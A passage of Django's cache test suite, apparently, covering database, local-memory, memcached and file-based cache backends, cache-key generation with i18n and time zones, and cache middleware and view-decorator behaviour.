@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = six.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
